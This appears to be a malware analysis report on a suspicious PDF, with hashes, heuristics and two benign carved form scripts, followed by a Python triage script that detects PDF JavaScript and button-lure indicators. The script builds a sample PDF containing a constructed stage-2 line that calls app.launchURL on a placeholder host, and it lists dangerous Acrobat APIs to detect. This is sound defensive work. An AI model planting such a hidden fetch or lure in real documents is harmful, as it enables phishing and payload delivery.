Malicious PDF — malware analysis report

Static analysis result for SHA-256 36c34d74192710fc…

Verdict: MALICIOUS
File type: PDF
Size: 68.3 KB
Created: 2010-08-18 15:02:21
Authoring application: Oracle9iAS Reports Services (via Oracle PDF driver)
First seen: 2026-05-10
MD5: 7b30a488212cf263af0976d8f5951b28
SHA-1: 9ef4d685fb7ab6965b4b0843b6aefa8bc0b7a12b
SHA-256: 36c34d74192710fc0da82d9eee5558f86f9148099918f75543b0ae325804f214
Risk score: 62

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1566.002 Phishing: Spearphishing Attachment

The PDF contains embedded JavaScript streams and an AcroForm button with an action trigger; together these are the building blocks of fake "Download" or "Open" button lures and can run script when the field is activated. The presence of an ASCII85Decode filter, which is sometimes used to obscure malicious content, adds weight to that assessment. Note, however, that the two /JS objects actually carved from the sample (see Extracted artifacts) are one-line form event handlers, OCLN.OCLN_fieldFocus(...) and OCLN_checkHiddenBox(...), consistent with the Oracle Reports authoring application, and contain no download, network or shell invocation. The suggestion that the JavaScript fetches and executes a second-stage payload, and the T1059.001 PowerShell mapping, are therefore not supported by the extracted evidence; the exact nature of any payload cannot be determined from what was recovered.

Machine Learning

  • Nyx PDF Classifier malicious score 0.8896

Heuristics (4)

  • JavaScript action (severity: low; 1 related finding) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ASCII85Decode filter with exploit indicators (severity: low) PDF_FILTER_85
    ASCII85 encoding filter present alongside exploit delivery indicators; uncommon outside of obfuscation.
  • AcroForm button with action trigger (severity: low) PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger. This is the building block of the fake "Download" or "Open" button overlays used in PDF phishing lures.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

  • javascript_obj0071_000.js
    Kind: pdf-javascript-stream
    Source: PDF /JS object 71 at offset 0x6945
    Size: 40 bytes
    SHA-256: bfcbd66b81ce376d9f45363a3d634e9e4d57e1fb200b1cc30990893ece7f6c1f
    Script (complete; the 40 bytes are this single line):
    OCLN.OCLN_fieldFocus(event.target.name);
  • javascript_obj0087_001.js
    Kind: pdf-javascript-stream
    Source: PDF /JS object 87 at offset 0x7559
    Size: 38 bytes
    SHA-256: ed4b5cde3f355cfe3b30961fd3042fd75b91b0a37a8a62daa3f59a1db9f6ef58
    Script (complete; the 38 bytes are this single line):
    OCLN_checkHiddenBox(event.targetName);
  • stream_002_off000027d0.bin
    Kind: decompressed-pdf-stream
    Source: PDF FlateDecoded stream at offset 0x27D0
    Size: 104,368 bytes
    SHA-256: f8d9ddcd9d5728b74aee25485cc451ae69d3f1d914db51b4c793504f4e43e37c
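The following Python script is an added example, not the analyser's own code, written to show how the four heuristics above and the artifact scan fit together. It walks the objects of a constructed sample PDF that mirrors this report's indicators (a /Btn widget whose /A action is /JavaScript with a /JS reference, and a stream filtered with ASCII85Decode then FlateDecode), decodes the stream, recovers every /JS script, and scans each for a short, assumed list of Acrobat JavaScript APIs that a separate rule would score. The sample PDF, the stage-2 script inside it (pointing at example.invalid) and the API list are constructed for the example; the two scripts carved from this report are fed through the same scanner and trip none of the APIs, which is what the Extracted artifacts section shows. The regexes are deliberately narrow and this is not a full PDF parser (no xref, object streams or encryption).

```python
"""Static triage for PDF JavaScript and form-action indicators (added example)."""
import base64
import re
import zlib

# Acrobat JS APIs a separate rule would score. Assumed list, not the report's rule set.
DANGEROUS_JS_APIS = (
    "app.launchURL", "this.submitForm", "exportDataObject", "Net.HTTP",
    "util.printf", "app.setTimeOut", "eval(", "unescape(", "Collab.",
)
# Action types that turn a /Btn field into a lure, per the PDF_ACROFORM_BUTTON rule text.
TRIGGER_TYPES = (b"/JavaScript", b"/SubmitForm", b"/URI", b"/Launch")

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
FILTER_RE = re.compile(rb"/Filter\s*(\[[^\]]*\]|/\w+)")
ACTION_RE = re.compile(rb"/S\s*(/\w+)")
# /JS followed by a literal string or an indirect reference to a stream object.
JS_RE = re.compile(rb"/JS\s*(?:\((?P<lit>(?:\\.|[^\\)])*)\)|(?P<ref>\d+)\s+\d+\s+R)", re.S)

# The two /JS objects carved from the report's sample (copied from the artifact list above).
CARVED_SCRIPTS = {
    "javascript_obj0071_000.js": "OCLN.OCLN_fieldFocus(event.target.name);",
    "javascript_obj0087_001.js": "OCLN_checkHiddenBox(event.targetName);",
}


def stream_filters(body):
    """Filter names declared on an object, in application order."""
    m = FILTER_RE.search(body)
    return [f.decode() for f in re.findall(rb"/(\w+)", m.group(1))] if m else []


def decode_stream(body):
    """Apply the object's filter chain; returns None when the object has no stream."""
    m = STREAM_RE.search(body)
    if not m:
        return None
    raw = m.group(1)
    for name in stream_filters(body):
        if name == "ASCII85Decode":
            raw = raw.strip()
            if raw.endswith(b"~>"):      # PDF streams carry only the trailing Adobe marker
                raw = raw[:-2]
            raw = base64.a85decode(raw)  # whitespace inside the data is ignored
        elif name == "FlateDecode":
            raw = zlib.decompress(raw)
        else:
            raise ValueError("unsupported filter " + name)
    return raw


def extract_js(head, objects):
    """Script attached via /JS: inline literal (unescaped) or a referenced, decoded stream."""
    m = JS_RE.search(head)
    if not m:
        return None
    if m.group("lit") is not None:
        return re.sub(rb"\\([()\\])", rb"\1", m.group("lit")).decode("latin-1")
    data = decode_stream(objects.get(int(m.group("ref")), b""))
    return data.decode("latin-1") if data else None


def scan_js(script):
    return [api for api in DANGEROUS_JS_APIS if api in script]


def scan_carved():
    """Run the API scan over the report's two carved scripts."""
    return {name: scan_js(s) for name, s in CARVED_SCRIPTS.items()}


def triage(data):
    objects = {int(m.group(1)): m.group(2) for m in OBJ_RE.finditer(data)}
    f = {"PDF_JAVASCRIPT": [], "PDF_JS": [], "PDF_FILTER_85": [],
         "PDF_ACROFORM_BUTTON": [], "scripts": {}, "dangerous_apis": {}}
    for num, body in objects.items():
        head = re.split(rb"\bstream\r?\n", body, 1)[0]   # dictionary part only
        actions = ACTION_RE.findall(head)
        has_js = JS_RE.search(head) is not None
        if b"/JavaScript" in actions:
            f["PDF_JAVASCRIPT"].append(num)
        if has_js:
            f["PDF_JS"].append(num)
        if "ASCII85Decode" in stream_filters(head):
            f["PDF_FILTER_85"].append(num)
        if re.search(rb"/FT\s*/Btn", head) and (has_js or any(t in actions for t in TRIGGER_TYPES)):
            f["PDF_ACROFORM_BUTTON"].append(num)
        script = extract_js(head, objects)
        if script:
            f["scripts"][num] = script
            hits = scan_js(script)
            if hits:
                f["dangerous_apis"][num] = hits
    return f


def build_sample():
    """Constructed PDF mirroring the report's indicators; not the analysed file."""
    stage2 = b'app.launchURL("http://example.invalid/stage2", true);'  # constructed
    enc = base64.a85encode(zlib.compress(stage2)) + b"~>"
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [4 0 R] >> /OpenAction 5 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /Annots [4 0 R] >>",
        b"<< /Type /Annot /Subtype /Widget /FT /Btn /T (Download) /A << /S /JavaScript /JS 6 0 R >> >>",
        b"<< /S /JavaScript /JS (OCLN.OCLN_fieldFocus\\(event.target.name\\);) >>",
        b"<< /Length %d /Filter [/ASCII85Decode /FlateDecode] >>\nstream\n%s\nendstream" % (len(enc), enc),
    ]
    body = b"".join(b"%d 0 obj\n%s\nendobj\n" % (i + 1, o) for i, o in enumerate(objs))
    return b"%PDF-1.4\n" + body + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    result = triage(build_sample())
    for rule in ("PDF_JAVASCRIPT", "PDF_JS", "PDF_FILTER_85", "PDF_ACROFORM_BUTTON"):
        print(rule, result[rule])
    for num, js in result["scripts"].items():
        print("obj", num, repr(js), "dangerous:", result["dangerous_apis"].get(num, []))
    print("carved scripts:", scan_carved())
```

On the constructed sample, all four rules fire (objects 4 and 5 for the JavaScript action and /JS, object 6 for ASCII85Decode, object 4 for the /Btn with trigger) and the decoded stream is the only script that hits the API list. The two carved scripts from this report pass through the same scanner with no hits, which is why the generic JavaScript rules score them low and the dangerous-API rules are left to decide.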